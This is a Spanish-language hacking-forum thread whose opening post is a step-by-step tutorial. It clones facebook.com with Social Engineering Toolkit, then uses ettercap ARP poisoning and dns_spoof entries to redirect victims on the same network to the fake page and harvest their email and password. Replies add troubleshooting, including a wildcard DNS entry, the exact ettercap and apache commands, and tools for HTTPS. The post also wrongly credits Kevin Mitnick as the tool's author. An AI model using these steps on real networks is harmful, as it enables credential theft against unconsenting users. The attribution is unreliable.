Underc0de

[In]Seguridad Informática => Hacking => Mensaje iniciado por: OswireW0rding en Marzo 12, 2014, 08:49:17 PM

Título: (DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: OswireW0rding en Marzo 12, 2014, 08:49:17 PM
Hola amigos y lectores, en este post les vengo a explicar como utilizar el Menú de Sitio de Clonación, bueno ante de todo Social Engineering Toolkit es una herramienta de "Ingeniería Social" como su palabra lo dice se basa en muchos módulos y menús.

Social Engineering Toolkit se basa en muchos módulos y menús es una herramienta echa por "Kevin David Mitnick" un cracker buscado mundialmente buscado por el F.B.I a finales de los años 90 (1995), Social Engineering Toolkit se basa en las siguientes herramientas.

- Clonación de Websites.(NO-IP)
- Vulnerabilidades en Sistemas Operativos.


Bueno para decir la verdad esto son solos los menús que me se pero seguire leyendo sobre esta increible herramienta. En este módulo que usaremos se basa en la suplantación de dominios "NO-IP" (DNS) o viceversa, bueno comenzemos, primero tendríamos que abrir la herramienta Social Engineering Toolkit entonces la ubicación sería la seguiente.

BackTrack >> Explotation Tools >> Social Engineering Tools >> Social Engineering Toolkit >> set

O colocariamos lo siguiente en la terminal:

cd /pentest/exploits/set/
./set

Foto:

(http://4.bp.blogspot.com/-IPr_wAX1yO0/UxtKrpB5MCI/AAAAAAAAAQI/R25nKz0saM8/s1600/Screenshot.png)

Y listo ya tendríamos la consola de Social Engineering Toolkit abierto ahora nos aparecería los siguientes menús.

Foto:

(http://4.bp.blogspot.com/-GI45DhxGiFk/UxtLfcThdwI/AAAAAAAAAQQ/ai44GDXlYJg/s1600/Screenshot.png)


Entonces elegiriamos el Menú 1, entonces pondríamos el número "1" sin las comillas y le daríamos enter y nos aparecerán otros menús.

Foto:

(http://1.bp.blogspot.com/-QW0tQ3VgeEI/UxtMRFiVTuI/AAAAAAAAAQc/gIR_ICa64WU/s1600/Screenshot.png)

Elegiríamos el menu número "2" sin las comillas y daríamos enter y nos aparecerá otros menus.

Foto:

(http://1.bp.blogspot.com/-ENzshqvxfVI/UxtNERe8vLI/AAAAAAAAAQk/AD8CsZix584/s1600/Screenshot.png)

Entonces elegiríamos el menu 3 y le daríamos enter y nos aparecerá los siguientes menus.

Foto:

(http://4.bp.blogspot.com/-75TrBNxtTMU/UxtOzuC73PI/AAAAAAAAAQw/bNcB-6lqT3Q/s1600/Screenshot.png)

Elegiríamos el menu 2 y nos aparecerá lo siguiente para comenzar a clonar un sitio web.

Foto:

(http://4.bp.blogspot.com/-4mlYVGCqyaY/UxtPTZfNjjI/AAAAAAAAAQ4/62L-pi1n9Mo/s1600/Screenshot.png)


Y nos dice que pongamos nuestra dirección Ip, como verán colocaremos nuestra Dirección Ip Local y no dirección Ip Pública y colocaríamos nuestra Dirección Ip y daríamos enter.

Foto:

(http://2.bp.blogspot.com/-VaCwGNOPHqg/UxtQwOKC_3I/AAAAAAAAARE/-o8F0gBOMHQ/s1600/Screenshot.png)

Entonces clonarimos la website de facebook.com y le daríamos enter y nos quedaría así.

Foto:

(http://2.bp.blogspot.com/-3QfbSC6hra0/UxtRLJ32sdI/AAAAAAAAARM/AWkwt9yOMbM/s1600/Screenshot.png)


Y listo como verán se ha inciado la clonación "OJO" este proceso solo sirve para los demás servidores que estan conectados a la misma red, entonces ahora haríamos lo siguiente, abririamos otra terminal o pestaña como ustedes quierán y colocaríamos lo siguiente:

gedit /usr/local/share/ettercap/etter.dns y le daríamos enter.

Foto:

(http://1.bp.blogspot.com/-G9cXA6bMAHc/UxtSI1dgeWI/AAAAAAAAARU/UopLOE3cMyE/s1600/Screenshot.png)


Y como verán crearemos los siguientes parametros para ingresar el dominio y dirección ip.

Dominio.com A IP
*.Dominio A IP
www.dominio.com PTR IP

Donde dice dominio es obvio que hay pondremos el dominio que clonamos y la dirección Ip y daríamos a guardar, okey después de eso colocariamos para finalizar en la terminal:

ettercap -T -q -i Adaptador de red -P dns_spoof -M arp // //

Y daríamos enter para finalizar, ojo donde dice "Adaptador de red" pondriamos el interface de donde estamos conectados una red Local o red Wi-Fi.

Foto:

(http://3.bp.blogspot.com/-KW9FZK4gSNo/UxtTXmG-NQI/AAAAAAAAARc/ps4-LeLwjWc/s1600/Screenshot.png)

Y listo ahora colocaríamos en la URL "facebook.com" o nuestra dirección Ip que hemos colocado. sin las comillas y pondríamos nuestro correo y contraseña pero como verán colocare una contraseña falsa.

Foto:

(http://2.bp.blogspot.com/-bavo2a1CkSY/UxtVvo0rBzI/AAAAAAAAARo/C_8x6TonjO4/s1600/Screenshot.png)

Y como verán nuestra victima se ha echo login con su correo electrónico y contraseña, ojo también podremos clonar otros sitio web.
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: r4gnath0r en Febrero 17, 2016, 12:10:46 AM
Hola.
He hecho todos los pasos como aquí indicas, pero cuando intento ingresar desde el pc victima a la web, me aparece el error de "Esta pagina no está disponible". He tratado hacerlo con Ettercap de manera gráfica como con dnsspoof -f "fichero con la ip y la web clonada" sin conseguir ninguna respuesta.

¿Qué puedo hacer?
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: puntoCL en Febrero 17, 2016, 02:38:21 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola.
He hecho todos los pasos como aquí indicas, pero cuando intento ingresar desde el pc victima a la web, me aparece el error de "Esta pagina no está disponible". He tratado hacerlo con Ettercap de manera gráfica como con dnsspoof -f "fichero con la ip y la web clonada" sin conseguir ninguna respuesta.

¿Qué puedo hacer?

Primero: Cual es el distrito que estas ocupado?

Segundo: Si no me equivoco te fato correr el serivcio apache

Saludos
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: 3v4Si0n en Febrero 17, 2016, 07:52:19 AM
A mi tampoco me ha funcionado, he levantado el servicio apache y nada.
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: puntoCL en Febrero 17, 2016, 08:55:09 AM
(http://www.subeimagenes.com/img/captura-de-pantalla-de-2016-02-17-08-38-33-1641130.png)

1. mira la IP en mi caso era 192.168.0.2
2. edita el etter.dns en la IMG sale * a 192.168.0.2 el " * " significa todo osea que todas la pagina que visite me redirigirá  a la IP 192.168.0.2
3. corro el serivicio apache service "apache2 start"
4. corro el ettercap "ettercap -T -i wlan0 -M ARP -P dns_spoof -q "

Tiene que tener cuidado con el "https" ya eso es otro tema
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: 3v4Si0n en Febrero 17, 2016, 11:59:26 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(http://www.subeimagenes.com/img/captura-de-pantalla-de-2016-02-17-08-38-33-1641130.png)

1. mira la IP en mi caso era 192.168.0.2
2. edita el etter.dns en la IMG sale * a 192.168.0.2 el " * " significa todo osea que todas la pagina que visite me redirigirá  a la IP 192.168.0.2
3. corro el serivicio apache service "apache2 start"
4. corro el ettercap "ettercap -T -i wlan0 -M ARP -P dns_spoof -q "

Tiene que tener cuidado con el "https" ya eso es otro tema
Vale jajaj yo lo probé con https por eso no funcionaba
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: puntoCL en Febrero 17, 2016, 12:02:24 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(http://www.subeimagenes.com/img/captura-de-pantalla-de-2016-02-17-08-38-33-1641130.png)

1. mira la IP en mi caso era 192.168.0.2
2. edita el etter.dns en la IMG sale * a 192.168.0.2 el " * " significa todo osea que todas la pagina que visite me redirigirá  a la IP 192.168.0.2
3. corro el serivicio apache service "apache2 start"
4. corro el ettercap "ettercap -T -i wlan0 -M ARP -P dns_spoof -q "

Tiene que tener cuidado con el "https" ya eso es otro tema
Vale jajaj yo lo probé con https por eso no funcionaba

hahahhaha classic para el https prueba con bettercap
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: blackdrake en Febrero 17, 2016, 04:22:11 PM
Muy buen aporte para los que se inician en esta técnica @OswireW0rding (https://underc0de.org/foro/index.php?action=profile;u=33109), espero seguir viendo post tuyos.

Saludos :D
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: r4gnath0r en Febrero 17, 2016, 10:23:17 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola.
He hecho todos los pasos como aquí indicas, pero cuando intento ingresar desde el pc victima a la web, me aparece el error de "Esta pagina no está disponible". He tratado hacerlo con Ettercap de manera gráfica como con dnsspoof -f "fichero con la ip y la web clonada" sin conseguir ninguna respuesta.

¿Qué puedo hacer?

Primero: Cual es el distrito que estas ocupado?

Segundo: Si no me equivoco te fato correr el serivcio apache

Saludos

Estoy usando Kali Linux. Perdón por no mencionarlo, el servicio Apache si que lo activo, da la opcion SET a activarlo una vez ha clonado la página.
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: maxlife en Febrero 19, 2016, 01:49:30 PM
Buenas a todos amigo tengo una duda para hacer ese ataque es necesario abrir puertos del router cierto
Título: Re:(DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: puntoCL en Febrero 19, 2016, 02:47:09 PM
@maxlife (https://underc0de.org/foro/index.php?action=profile;u=6599) no es necesario abrir puerto o si no en el tutorial lo mensionarias
Título: Re: (DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: lagartoman en Julio 29, 2022, 04:06:37 PM
Gracias por el dato
Título: Re: (DNS SPOOFING) Utilizando la herramienta Social Engineering Toolkit
Publicado por: topgun1964 en Julio 30, 2022, 12:21:12 PM
perdonad mi ignoracion pero donde esta el repositorio o la sintaxis para la instalacion de dicha herramienta